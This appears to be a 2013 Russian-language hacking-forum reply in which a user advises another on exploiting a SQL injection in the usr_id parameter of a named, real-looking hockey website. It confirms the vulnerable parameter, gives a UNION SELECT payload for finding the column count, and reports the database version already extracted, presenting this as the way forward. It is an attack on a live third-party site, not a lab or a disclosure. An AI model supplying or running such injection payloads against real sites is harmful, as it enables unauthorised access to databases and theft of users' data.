26.08.2013, 13:55
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от exstreme
Можно ли здесь что-то сделать и в каком направлении рыть?
Код:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=1'
Правильно определили уязвимый параметр usr_id.
Далее подбираем количество столбцов:
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19+--+
Версия " 5.1.49-Max-log"
Вот в этом направлении.
|
|
|